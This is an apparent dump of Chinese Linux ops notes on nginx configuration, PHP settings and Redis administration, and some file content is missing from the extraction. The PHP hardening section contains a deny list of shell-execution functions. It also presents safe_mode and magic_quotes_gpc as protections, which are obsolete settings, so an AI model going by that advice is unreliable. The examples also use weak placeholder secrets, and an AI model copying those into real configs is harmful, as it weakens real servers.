https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/he-xin-gong-neng-fen-lei-pei-zhi.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/huan-cun-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/huan-cun-fu-wu.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/huan-cun-fu-wu/nginx.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/huan-cun-fu-wu/nginx.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/huan-cun-fu-wu/squid.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/huan-cun-fu-wu/squid.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/mongo.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/mongo.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/mysql.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/mysql.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/nginx.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/nginx.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/nginx/he-xin-pei-zhi-fen-lei.md:
--------------------------------------------------------------------------------
1 | ### 一、用于调试配置项
2 | - daemon
3 |
4 | - master_process
5 |
6 | - error_log
7 |
8 | - debug_points
9 |
10 | - debug_connection
11 |
12 | - worker_rlimit_core
13 |
14 | - working_directory
15 |
16 | ### 二、正常运行的必备配置项
17 | - env
18 |
19 | - include
20 |
21 | - pid
22 |
23 | - user
24 |
25 | - worker_rlimit_nofile
26 |
27 | - worker_rlimit_sigpending
28 |
29 | ### 三、优化性能的配置项
30 | - worker_processes
31 |
32 | - worker_cpu_affinity
33 |
34 | - ssl_engine
35 |
36 | - timer_resolution
37 |
38 | - worker_priority
39 |
40 | ### 四、事件类配置项
41 | - accept_mutex
42 |
43 | - lock_file
44 |
45 | - accept_mutex_delay
46 |
47 | - multi_accept
48 |
49 | - use
50 |
51 | - worker_connections
52 |
53 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/nginx/kai-qi-nginx-zhuang-tai-ye-mian.md:
--------------------------------------------------------------------------------
1 | ## 开启nginx状态页面
2 |
3 | ### 一、安装指定模块
4 |
5 |
6 | nginx -V 查看是否安装
7 | --with-http_stub_status_module 模块
8 |
9 | #编译安装时添加如下参数
10 | ./configure --with-http_stub_status_module
11 |
12 | ### 二、配置
13 | **1、配置实例 **
14 |
15 | server {
16 | listen 80;
17 | server_name 127.0.0.1;
18 |
19 | location /status {
20 | stub_status on;
21 | access_log off;
22 | allow 127.0.0.1;
23 | deny all;
24 | }
25 | }
26 |
27 | **2、检查结果**
28 |
29 | curl http://127.0.0.1/status
30 |
31 | Active connections: 1
32 | server accepts handled requests
33 | 687 687 1726
34 | Reading: 0 Writing: 1 Waiting: 0
35 |
36 | **3、参数详解**
37 |
38 | Active connections: 当前nginx正在处理的活动连接数.
39 | Server accepts handled requests request_time: nginx总共处理了687 个连接,成功创建687 握手(证明中间没有失败的),总共处理了1726 个请求
40 | Reading: nginx读取到客户端的Header信息数.
41 | Writing: nginx返回给客户端的Header信息数.
42 | Waiting: 开启keep-alive的情况下,这个值等于 active – (reading + writing),意思就是nginx已经处理完成,正在等候下一次请求指令的驻留连接。
43 |
44 | 所以,在访问效率高,请求很快被处理完毕的情况下,Waiting数比较多是正常的.如果reading +writing数较多,则说明并发访问量非常大,正在处理过程中。
45 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/nginx/liu-lan-qi-bu-zi-dong-jie-xi-bo-fang-wen-jian.md:
--------------------------------------------------------------------------------
1 | # 浏览器不自动解析播放文件
2 |
3 | ### 1、配置 文件类型为 流
4 | location /download/ {
5 | types { }
6 | default_type application/octet-stream;
7 | }
8 |
9 | ### 2、测试
10 | 主要观察:`Content-Type: application/octet-stream` 字段
11 |
12 | 1 - 火狐浏览器
13 | Server Nginx
14 | Date Thu, 14 Mar 2019 10:33:33 GMT
15 | Content-Type application/octet-stream
16 | Content-Length 33855
17 | Last-Modified Wed, 06 Mar 2019 21:16:18 GMT
18 | Connection keep-alive
19 | ETag "5c8038a2-843f"
20 | Expires Sat, 13 Apr 2019 10:33:33 GMT
21 | Cache-Control max-age=2592000
22 | Accept-Ranges bytes
23 |
24 | #注意:火狐浏览器会自动播放,这个是浏览器的特性。
25 |
26 | 2 - chrome
27 | Accept-Ranges: bytes
28 | Cache-Control: max-age=2592000
29 | Connection: keep-alive
30 | Content-Length: 33855
31 | Content-Type: application/octet-stream
32 | Date: Thu, 14 Mar 2019 10:35:25 GMT
33 | ETag: "5c8038a2-843f"
34 | Expires: Sat, 13 Apr 2019 10:35:25 GMT
35 | Last-Modified: Wed, 06 Mar 2019 21:16:18 GMT
36 | Server: Nginx
37 |
38 | #注意:chrome 添加前,和添加后都不会播放
39 |
40 | 3 - curl
41 |
42 | # curl http://www.peter-zhou.com/download/xxx.mp4 -I
43 | HTTP/1.1 200 OK
44 | Server: Nginx
45 | Date: Thu, 14 Mar 2019 10:32:07 GMT
46 | Content-Type: application/octet-stream
47 | Content-Length: 33855
48 | Last-Modified: Wed, 06 Mar 2019 21:16:18 GMT
49 | Connection: keep-alive
50 | ETag: "5c8038a2-843f"
51 | Expires: Sat, 13 Apr 2019 10:32:07 GMT
52 | Cache-Control: max-age=2592000
53 | Accept-Ranges: bytes
54 |
55 |
56 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/nginx/nginx-dai-li-304-wen-ti.md:
--------------------------------------------------------------------------------
1 | # nginx 代理304问题
2 |
3 | **1、配置代理不检查304**
4 |
5 | location ^~ /test/ {
6 | proxy_pass http://10.1.1.1/;
7 | proxy_set_header Host test.peter-zhou.com;
8 | proxy_set_header If-Modified-Since "";
9 | proxy_set_header If-None-Match "";
10 | }
11 |
12 | **2、测试**
13 |
14 | 网页打开http://xxx.xxx.xxx/test/test.html 两次
15 | 检查http code 是否一直为200
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/nginx/nginx-dai-li-websocket.md:
--------------------------------------------------------------------------------
1 | # 代理websocket
2 |
3 | ### 一、配置nginx
4 |
5 | upstream wsbackend {
6 | server 127.0.0.1:10000;
7 | server 127.0.0.1:10000;
8 | }
9 | server {
10 | listen 80;
11 | server_name ws.peter-zhou.com;
12 | location / {
13 | proxy_pass http://wsbackend;
14 | proxy_http_version 1.1;
15 | proxy_set_header Upgrade $http_upgrade;
16 | proxy_set_header Connection "upgrade";
17 | }
18 | }
19 |
20 | ### 二、websocket 服务调试
21 | **1、websocket server 实现(Python)**
22 |
23 | #! /usr/bin/env python
24 | # -*- coding: utf-8 -*-
25 | # vim:fenc=utf-8
26 | #
27 | # pip install bottle_websocket
28 | # pip install bottle
29 | from bottle import get, run, template
30 | from bottle.ext.websocket import GeventWebSocketServer
31 | from bottle.ext.websocket import websocket
32 | import gevent
33 | users = set()
34 | @get('/')
35 | def index():
36 | return template('index')
37 | @get('/websocket', apply=[websocket])
38 | def chat(ws):
39 | users.add(ws)
40 | while True:
41 | msg = ws.receive()
42 | if msg is not None:
43 | for u in users:
44 | print type(u)
45 | u.send(msg)
46 | print u,msg
47 | else: break
48 | users.remove(ws)
49 | run(host='xxx.xxx.xxx.xxx', port=10000, server=GeventWebSocketServer)
50 |
51 | **2、websocket client实现(html)**
52 |
53 |
54 |
55 |
56 |
79 |
80 |
81 |
86 |
87 |
88 |
89 | ### 三、测试
90 | **1、跳过nginx代理访问**
91 |
92 | 直接修改为websocket地址,打开两个页面看是否能互相通信
93 |
94 | **2、访问nginx代理**
95 |
96 | 修改为nginx上下游的域名,打开两个页面看是否能互相通信
--------------------------------------------------------------------------------
/fu-wu-bu-shu/nginx/nginx-fan-hui-json-shu-ju.md:
--------------------------------------------------------------------------------
1 | # nginx 返回指定数据
2 |
3 | ### 一、 返回json
4 | **1、配置指定路劲返回相应json信息**
5 |
6 | location ~ ^/get_info {
7 | default_type application/json;
8 | return 200 '{"status":"success","result":"hello world!"}';
9 | }
10 |
11 | 注意:当开发某个接口固定是一个返回值时,可以用此方法返回。节省后端处理过程
12 |
13 | **2、测试**
14 |
15 | # curl http://www.peter-zhou.com/get_info
16 | {"status":"success","result":"hello world!"}
17 |
18 | ### 二、返回text
19 | **1、配置指定路劲返回相应text信息**
20 |
21 | location ~ ^/get_info1 {
22 | default_type text/html;
23 | return 200 'hello world!';
24 | }
25 |
26 | location ~ ^/get_info2 {
27 | default_type text/html;
28 | return 200 '你好,世界!';
29 | }
30 |
31 | location ~ ^/get_info3 {
32 | default_type text/html;
33 | add_header Content-Type 'text/html; charset=utf-8';
34 | return 200 '你好,世界!';
35 | }
36 |
37 | 注意:当有些浏览器默认用gbk 来解析就会出现中文乱码,这时候需要添加header转换为utf-8
38 | **2、测试**
39 |
40 | # curl http://www.peter-zhou.com/get_info1
41 | hello world!
42 |
43 |
44 | #curl http://www.peter-zhou.com/get_info2
45 | 你好,世界!
46 |
47 |
48 | #curl http://www.peter-zhou.com/get_info3 -I
49 | HTTP/1.1 200 OK
50 | Server: Nginx
51 | Date: Fri, 15 Mar 2019 06:21:58 GMT
52 | Content-Type: text/html; charset=utf-8
53 | Content-Length: 16
54 | Connection: keep-alive
55 |
56 | ### 三、根据url 返回数据
57 |
58 | **1、配置匹配规则**
59 |
60 | location ~ ^/return/(.*)_(\d+).html$ {
61 | default_type text/html;
62 | set $string $1;
63 | set $data $2;
64 | return 200 $string:$data;
65 | }
66 |
67 | location ~ ^/return/(.*)/(\d+)$ {
68 | default_type text/html;
69 | set $string $1;
70 | set $data $2;
71 | return 200 $string:$data;
72 | }
73 |
74 | 注意:根据url参数http://xxx/test.html?name=xxx&id=xxx 同理也可以用这种方式匹配返回
75 |
76 | **2、测试**
77 |
78 | #curl http://www.peter-zhou.com/return/test_01.html
79 | test:01
80 |
81 | #curl http://www.peter-zhou.com/return/aaa/123
82 | aaa:123
83 |
84 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/nginx/nginx-wen-jian-fang-dao-lian.md:
--------------------------------------------------------------------------------
1 | # 文件下载防盗链
2 |
3 | ### 一、使用场景
4 |
5 | 1、客户端发起下载申请--> app服务器(文件上传会生成自己格式的文件名)
6 | 2、app服务器返回下载地址 --> 客户端
7 | 3、客户端下载 --> web服务器(nginx)
8 |
9 | ### 二、nginx配置
10 |
11 | **1、 开启secure_link 模块**
12 |
13 | #编译开启 --with-http_secure_link_module
14 |
15 | **2、配置nginx**
16 |
17 | server {
18 | listen 80;
19 | server_name download.peter-zhou.com;
20 |
21 | location / {
22 | #设置md5 expires
23 | secure_link $arg_md5,$arg_expires;
24 |
25 | #设置secret+url+expires
26 | secure_link_md5 "123456$uri$arg_expires";
27 |
28 |
29 | #比较哈希值
30 | if ($secure_link = "") {
31 | return 403;
32 | }
33 |
34 | #验证是否超时
35 | if ($secure_link = "0") {
36 | return 410;
37 | }
38 |
39 | #直接下载防止打开文件
40 | if ($request_filename ~* ^.*?\.(mp4|txt|jpg)$){
41 | add_header Content-Disposition 'attachment;';
42 | }
43 |
44 | #重命名
45 | add_header Content-Disposition "attachment;filename*=utf-8'zh_cn'$arg_filename";
46 |
47 | }
48 | }
49 |
50 | **3、app服务器功能实现 **
51 |
52 | 实现返回客户端url为:`url+md5+expires+filename`
53 |
54 | 注意:
12 | >>配置: add_header Content-Disposition "attachment;filename=$arg_n";
13 | chrome 正常,火狐浏览器会出现下载文件名乱码的问题,后端处理完后unicode 后还是一样的
14 |
15 | >调整完:add_header Content-Disposition "attachment;filename*=utf-8'zh_cn'$arg_n";
16 | chrome 正常,火狐也正常(意思是将文件名转换成utf-8中文)
17 |
18 | ### 2、测试
19 |
20 | #firefox
21 | http://www.peter-zhou.com/download/123.png?n=你好.png
22 |
23 |
24 | #chrome
25 | http://www.peter-zhou.com/download/123.png?n=你好.png
26 |
27 |
28 |
29 |
30 |
31 |
32 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/nginx/webpei-zhi-fen-lei.md:
--------------------------------------------------------------------------------
1 | # web 功能分类
2 |
3 |
4 | ### 一、虚拟主机与请求的分发 ###
5 | - listen
6 | - server_name
7 | - server_names_hash_bucket_size
8 | - server_names_hash_max_size
9 | - server_name_in_redirect
10 | - location
11 |
12 | ### 二、文件路径的定义 ###
13 | - root
14 | - alias
15 | - index
16 | - error_page
17 | - recursive_error_pages
18 | - try_files
19 |
20 | ### 三、内存及磁盘资源的分配 ###
21 | - client_body_in_file_only
22 | - client_body_in_single_buffer
23 | - client_header_buffer_size
24 | - large_client_header_buffers
25 | - client_body_buffer_size
26 | - client_body_temp_path
27 | - connection_poll_size
28 | - request_poll_size
29 |
30 | ### 四、网络连接设置 ###
31 | - client_header_timeout
32 | - client_body_timeout
33 | - send_timeout
34 | - reset_timeout_connection
35 | - lingering_close
36 | - lingering_time
37 | - lingering_timeout
38 | - keepalive_disable
39 | - keepalive_timeout
40 | - keepalive_requests
41 | - tcp_nodelay
42 | - tcp_nopush
43 |
44 | ### 五、MIME类型的设置 ###
45 | - type
46 | - default_type
47 | - types_hash_bucket_size
48 | - types_hash_max_size
49 |
50 | ### 六、对客户端请求的限制 ###
51 | - limit_except
52 | - client_max_body_size
53 | - limit_rate
54 | - limit_rate_after
55 |
56 | ### 七、文件操作的优化 ###
57 | - sendfile
58 | - aio
59 | - directio
60 | - directio_alignment
61 | - open_file_cache
62 | - open_file_cache_errors
63 | - open_file_cache_min_uses
64 | - open_file_cache_valid
65 |
66 | ### 八、对客户端请求的特殊处理 ###
67 | - ignore_invalid_headers
68 | - underscores_in_headers
69 | - if_modified_since
70 | - log_not_found
71 | - merge_slashes
72 | - resolver address
73 | - resolver_timeout
74 | - server_tokens
75 |
76 | ### 九、负载均衡的基本配置 ###
77 | - upstream
78 | - server
79 | - ip_hash
80 |
81 | ### 十、反向代理 ###
82 | - proxy_pass
83 | - proxy_method
84 | - proxy_hide_header
85 | - proxy_pass_header
86 | - proxy_pass_request_body
87 | - proxy_pass_request_headers
88 | - proxy_redirect
89 | - proxy_next_upstream
90 | -
--------------------------------------------------------------------------------
/fu-wu-bu-shu/php.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/php.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/php/php-huo-qu-tou-xin-xi.md:
--------------------------------------------------------------------------------
1 | ### PHP 获取请求头信息
2 |
3 | $value)
7 | {
8 | if (substr($name, 0, 5) == 'HTTP_')
9 | {
10 | $headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
11 | }
12 | }
13 | return $headers;
14 | }
15 | var_dump(em_getallheaders());
16 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/php/phphuan-jing-an-quan-jia-gu.md:
--------------------------------------------------------------------------------
1 | # PHP环境加固
2 |
3 | **1、启用php的安全模式**
4 | PHP环境提供的安全模式是一个非常重要的内嵌安全机制。
5 | PHP安全模式能有效控制一些PHP环境中的函数(例如:`system()`函数),对大部分的文件操作函数进行权限控制
6 |
7 | #vim php.ini
8 | safe_mode = on
9 |
10 | **2、用户组安全**
11 | 当启用安全模式后,如果`safe_mode_gid`选项被关闭,PHP脚本能够对被文件进行访问,且相同用户组的用户也能够对该文件进行访问,建议关闭
12 |
13 | #vim php.ini
14 | safe_mode_gid = off
15 |
16 | **3、安全模式下执行程序主目录**
17 | 当启用安全模式后,想要执行某些程序的时候,可以指定需要执行程序的主目录
18 |
19 | #vim php.ini
20 | safe_mode_exec_dir = /usr/bin
21 |
22 | 一般情况下,如果不需要执行什么程序,建议不要执行系统程序的目录,可以指定一个目录,然后把需要执行的程序拷贝到这个目录即可
23 |
24 | #vim php.ini
25 | safe_mode_exec_dir = /temp/cmd
26 |
27 | 推荐不要执行任何程序,将目录指向网页目录
28 |
29 | #vim php.ini
30 | safe_mode_exec_dir = /www
31 |
32 | **4、安全模式下包含文件**
33 | 如果在安全模式下包括某些公共文件
34 |
35 | #vim php.ini
36 | safe_mode_include_dir = /www/include/
37 |
38 | **5、控制PHP脚本能访问的目录**
39 | 使用`open_basedir` 选项能够控制PHP脚本只能访问指定的目录,这样避免PHP脚本访问不应该访问的文件
40 |
41 | #vim php.ini
42 | open_basedir = /www
43 |
44 | **6、关闭危险函数**
45 | 如果启用了安全模式,那么可以不需要设置函数禁止
46 |
47 | #vim php.ini
48 | disable_functions = system, passthru, exec, shell_exec, popen, phpinfo, escapeshellarg, escapeshellcmd, proc_close, proc_open, dl
49 |
50 | 禁止对文件和目录的操作
51 |
52 | #vim php.ini
53 | disable_functions = chdir, chroot, dir, getcwd, opendir, readdir, scandir, fopen, unlink, delete, copy, mkdir, rmdir, rename, file, file_get_contents, fputs, fwrite, chgrp,chmod, chown
54 |
55 | **7、关闭PHP版本信息在HTTP头中泄露**
56 | 防止获取服务器关于PHP版本的信息
57 |
58 | #vim php.ini
59 | expose_php = off
60 |
61 |
62 | **8、关闭注册全局变量**
63 | 在PHP环境中提交的变量,包括使用POST或者GET命令提交的变量,都将自动注册为全局变量,能够被直接访问
64 |
65 | #vim php.ini
66 | register_globals = off
67 |
68 | **9、SQL注入防护**
69 | 开启`magic_quotes_gpc`,PHP将自动把用户提交对SQL查询的请求进行转换:例如 把 ' 转换为 \'
70 |
71 | #vim php.ini
72 | magic_quotes_gpc = on
73 |
74 |
75 | 参考站点:[PHP手册-安全](http://php.net/manual/zh/ini.sect.safe-mode.php)
--------------------------------------------------------------------------------
/fu-wu-bu-shu/php/phppei-zhi-zhi-ding-cha-zhao-gong-xiang-ku-wen-jian-lu-jing.md:
--------------------------------------------------------------------------------
1 | # php配置指定查找共享库文件路劲
2 |
3 | **1、配置**
4 |
5 | vim /etc/php.ini
6 |
7 | ;include_path = ".:/php/includes"
8 | include_path = ".:/tmp/share"
9 |
10 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/redis.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/10rdbkuai-zhao-chi-jiu-hua.md:
--------------------------------------------------------------------------------
1 | ### rdb快照持久化
2 |
3 | **1、持久化:**把数据存储于断电后不会丢失的设备中,通常是硬盘
4 |
5 | **2、常见的持久化方式:**
6 |
7 | 主从:通过从服务器保存和持久化,如mongoDB和replication sets 配置
8 |
9 | 日志:操作生成相关日志,并通过日志来恢复
10 | couchDB对于数据内容不修改,只追加,则文件本身就是日志,不会丢失数据
11 |
12 | -----------------------------------------------------------------------
13 | rdb快照相关参数
14 | save 900 1 #刷新快照到硬盘中,必须满足两者要求才会触发,即900秒之后至少一个关键字发生变化
15 | save 300 10 #必须是300秒之后至少10个关键字发生变化
16 | save 60 1000 #必须是60秒之后至少10000个关键之发生变化
17 | stop-write-on-bgsave-error yes #后台存储错误停止写
18 | rdbcompression yes #使用lzf 压缩rdb文件
19 | rdbchechsum yes #存储和加载rdb文件时校验
20 | dbfilename dump.rdb #设置rdb文件名。
21 | dir ./ #设置工作目录,rdb文件会写入该目录
22 |
23 | **3、rdb的工作原理:**每隔N分钟或N次写操作后,从内存dump数据形成rdb文件,压缩放在备份目录
24 |
25 | **4、rdb的缺陷:**在2个保存点之间,断电,将会丢失1-N分钟的数据
26 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/11aof.md:
--------------------------------------------------------------------------------
1 | ### aof日志持久化
2 |
3 | aof的原理:set/append/写操作-->redis主进程-->后台日志进程-->aof文件
4 | 1、每个命令重写一次aof?
5 | 2、某key操作100次,产生100行记录,aof文件会很大怎么解决?
6 |
7 |
8 | **aof配置:**
9 |
10 | appendonly no #是否打开aof日志功能(默认关闭)
11 | appendfsync always #每1个命令都立即同步到aof 安全,速度慢
12 | appendfsync everysec #折中方案,每秒写一次
13 | appendfsync no #写入工作交给操作系统,由操作系统判断缓冲大小,统一写入到aof 同步频率低,速度快
14 |
15 | no-appendfsync-no-rewrite yes #正在导出rdb快照的过程中,要不要停止同步aof
16 | auto-aof-rewrite-percentage 100 #aof文件大小比起上次重写时的大小,增长率100%时,重写
17 | auto-aof-rewrite-min-size 64mb #aof文件,至少超过64M时,重写
18 |
19 | **几个问题:**
20 |
21 | - 在dump rdb过程中aof如果停止同步,会不会丢失?
22 |
23 | #不会,所有操作系统缓存在内存队列里,dump完成后,统一操作
24 |
25 | - aof重写是指什么?(同一个key,操作100次)
26 |
27 | #aof重写是指把内存中的数据,逆化成命令,写入到aof日志里,以解决aof日志过大的问题
28 |
29 | - 如果rdb文件和aof文件都存在,优先级由谁来恢复?
30 |
31 | #aof
32 |
33 | - 2种是否能同时用?
34 |
35 | #可以,而且推荐这么做
36 |
37 | - 恢复时,rdb和aof那个恢复的快?
38 |
39 | #rdb快,因为其数据的内存映射,直接载入到内存,而aof是命令,需要逐条执行
40 |
41 |
42 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/12rediszhu-cong-fu-zhi.md:
--------------------------------------------------------------------------------
1 | ### redis主从复制
2 |
3 | **1、集群的作用:**
4 |
5 | 主从备份,防止主机宕机
6 | 读写分离,分担master的任务
7 | 任务分离,如从服务器分别分担备份工作和计算工作
8 |
9 | **2、redis集群两种方式:**
10 |
11 |
12 | <--slave1
13 | master
14 | <--slave2
15 |
16 | master<--slave1<--slave2
17 |
18 |
19 | **3、主从通信过程**
20 |
21 | <-------------------sync[自动]-----------------
22 | master -------------------dump出rdb------------------> slave1
23 | ----缓冲的aof(dump的过程中又有数据过来了)----->
24 | ---replicationFeedSlaves(进程保持)------------>
25 |
26 | **4、redis集群配置**
27 |
28 | - Master配置:
29 |
30 | 1、关闭Rdb快照(备份工作交给Slave)
31 | 2、可以开启aof
32 |
33 | - Slave配置:
34 |
35 | 1、声明slaveof
36 | 2、配置密码【如果master有密码】
37 | 3、【某一个】slave打开rdb快照功能
38 | 4、配置是否自读【slave-read-only】
39 |
40 | **5、redis主从复制的缺陷**
41 |
42 | 缺陷: 每次slave断开后(无论是主动断开,还是网络故障)再连接master
43 | 都要master全部dump出来rdb,再aof(即同步的过程都要重新执行一遍)
44 |
45 | 切记:多台slave不要同时启动,否则master IO剧增0
46 |
47 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/13redisyun-wei-chang-yong-ming-ling.md:
--------------------------------------------------------------------------------
1 | ### redis运维常用命令
2 | **1、命令:**
3 |
4 | time 查看时间戳与微秒数
5 | dbsize 查看当前数据库有多少key
6 | bgrewriteaof 后台进程重写aof
7 | bgsave 后台保存rdb快照
8 | save 保存rdb快照
9 | lastsave 上次保存时间
10 |
11 | slaveof master-host port 把当前实例设置为master的slave
12 | flushall 清空所有库所有键
13 | flushdb 清空当前库所有键
14 | shutdown [""|save|nosave] 断开链接,关闭服务器
15 | slowlog get 显示慢查询
16 | info 显示服务器信息
17 | config get 获取配置信息
18 | config set 设置配置信息
19 | monitor 打开控制台
20 | sync 主从同步
21 | client list 客户端列表
22 | client kill 关闭某个客户端
23 | client setname 为客户端设置名字
24 | client getname 获取客户端名字
25 |
26 | **2、问题**
27 |
28 | 如果不小心运行了flushall ,立即shutdown nosave 关闭服务器,然后手动编辑aof文件,去掉文件中的"flashall"相关行,然后开启服务器,就可以导入回原来数据
29 | #如果flushall之后,系统恰好bgrewriteaof了,那么aof就清空了,数据丢失
30 |
31 | slowlog显示慢查询
32 | 多慢才叫慢?
33 | #由slowlog-log-slower-than 10000,来指定(单位是微秒)
34 |
35 | 服务器存储多少条慢查询的记录?
36 | #由 slowlog-max-len 128 来做限制
37 |
38 |
39 | **3、redis运维时需要注意的参数**
40 | - **内存**
41 |
42 | memory
43 | used_memory:859192 数据结构的空间
44 | used_memory:7634944 实占空间
45 | mem_fragmentaion_ratio:8.89 前2者的比例,1 N为最佳,如果此值过大,说明redis的内存的碎片化严重,可以导出再导入一次
46 |
47 | - **主从复制**
48 |
49 | replication
50 | role:slave
51 | master_host:xxx.xxx.xxx.xxx
52 | master_port:6379
53 | master_link_status:up
54 |
55 | - **持久化**
56 |
57 | persistence
58 | rdb_change_since_last_save:0
59 | rdb_last_save_time:1375224063
60 |
61 | - **fork耗时**
62 |
63 | status
64 | latest_fork_usec:936 上次导出rdb快照,持久化花费微秒
65 | 注意:如果实例有10G内容,导出需要2分钟
66 | 每分钟写入10000次,导致不断的rdb导出,磁盘处于高IO状态
67 |
68 | - **慢日志**
69 |
70 | config set/get slowlog-log-slower-than
71 | config get/set slowlog-max-len
72 | slowlog get 获取慢日志
73 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/14sentinel-yun-wei-jian-kong-ff08-shao-bing-ff09.md:
--------------------------------------------------------------------------------
1 | ### sentinel运维监控
2 |
3 | **监控配置:**
4 |
5 | sentinel monitor def_master 127.0.0.1 6379 2
6 | setinel auth-pass def_master 012_345^6789-90
7 | #master 被当前sentinel实例认定为“失效”的间隔时间
8 | #如果当前sentinel与master直接的通讯中,在指定时间内没有响应或者响应错误代码,那么
9 | #当前sentinel 就认为master 失效(Sdonw,"主观"失效)
10 | #
11 | #默认为30秒
12 | sentinel down-after-milliseconds def_master 30000
13 | #当前sentinel 实例是否允许实施“failover”(故障转移)
14 | #no表示当前sentinel为“观察者”(只参与“投票”,不参与实施failover)
15 | #全局至少有一个为yes
16 | sentinel can-failover def_master yes
17 | #sentinel notificatio-script mymaster /var/redis/notify.sh
18 |
19 |
20 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/153001-an-li-ff08-wei-tu-fa-tong-ji-huo-yue-yong-hu-ff09.md:
--------------------------------------------------------------------------------
1 | ### 案例
2 |
3 | 1、1亿个用户,用户有频繁登录的,也有不经常登录的
4 | 2、如何来记录用户的登录信息
5 | 3、如何来查询活跃用户[如一周内 登录三次的]
6 | 位运算:登录或没登录用0 1 表示
7 |
8 | 周1: 0 1 1 0 1 1 0
9 | 周2: 1 0 0 1 1 1 1
10 | 周3: 1 1 1 0 0 0 0
11 | ...
12 | 统计一周登录次数超过3次。用and 去统计
13 | sebit 命令去实现
14 |
15 | 优点:节约空间,1亿人每天的登录情况,用1亿个bit 约 1200w byte 。约10M的字符
16 | 计算方便
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/23001-tong-yong-key-ming-ling-cao-zuo.md:
--------------------------------------------------------------------------------
1 | ## 通用key命令操作
2 |
3 | ### 一、查询
4 |
5 | **1、查看所有key:** `keys *`
6 | **2、匹配查看 *:** `keys sit*`
7 | **3、单个字符匹配 ?:** `keys sit?`
8 | **4、可选匹配 []:** `keys sit[e|y]`
9 |
10 |
11 | ### 二、判断KEY类型
12 | **1、随机返回一个KEY:** `randomkey`
13 | **2、判断key 是否存在(0|1):** `exists site #1 表示存在 0 表示不存在`
14 | **3、返回KEY的类型:** `type site #数据类型有 string ,link ,set ,order set ,hash`
15 |
16 | ### 三、KEY的基本操作
17 | **1、删除KEY:** `del site`
18 |
19 | **2、重命名KEY:** `rename site web-site # site为旧名称 web-site 为新名称`
20 |
21 | #如果新名称已经存在会 覆盖已存在的key
22 |
23 | **3、重命名返回值判断:** `renamex sit web-site # site为旧名称 web-site 为新名称`
24 | #带返回参数的改名,如果新名称已经存在会 不覆盖已存在的新名称 并返回0,如果新名称不存在,修改成功,并返回1
25 |
26 | **4、移动KEY到其他库**: `move site 1 #将site 这个KEY移动到1号库。默认库0-15,验证 select 1 ;keys *`
27 | #默认开启了16个database ,redis.conf databases 关键字
28 |
29 | **5、查询KEY的有效生命周期:**`ttl site # -1 代表永久有效 -2 代表不存在 返回时间以秒为单位pttl site #返回时间以毫秒为单位`
30 |
31 | **6、修改KEY的有效生命周期:** `expire site 10 #设置生命周期为10 以秒为单位,请使用整数pexpire site 10 #设置时间以毫秒为单位`
32 |
33 | **7、设置一个KEY为永久有效:** ` persist site`
--------------------------------------------------------------------------------
/fu-wu-bu-shu/redis/3stringjie-gou-ji-ming-ling.md:
--------------------------------------------------------------------------------
1 | ### string结构及命令
2 |
3 | **1、添加字符串类型的key:** `set name longgege`
4 |
5 | **2、添加字符串类型的key,并设置有效时间:** `set name longdidi ex 10 # ex 秒 px 毫秒 nx 表示key 不存在,执行操作/xx表示存在,执行操作`
6 |
7 | **3、一次性设置多个key:** `mset name longe age 23 #name age 为key名`
8 |
9 | **4、获取key的值:** `get name`
10 |
11 | **5、一次性获取多个key:** `mget name ag`e
12 |
13 | **6、/*有疑问*/偏移修改**: `set world hello setrange world 2 ?? #对world这个key 的第三个字符开始修改。替换2个问号 。结果为 he??o`
14 |
15 | **7、偏移填充:** `set world hello setrange world 6 ! #缺省的部分会填充一个 \x00`
16 |
17 | **8、追加字符串:** `append world world #在原来的key值的基础上添加一个world`
18 |
19 | **9、获取值得一部分 :** `getrange world 0 3 #获取world这个key的第一个到第四个字符`
20 |
21 | **10、获取旧值,同时设置新的值**: `getset world nihao`
22 |
23 | **11、数字加一:** `incr num`
24 |
25 | **12、数字减一:** `decr num`
26 |
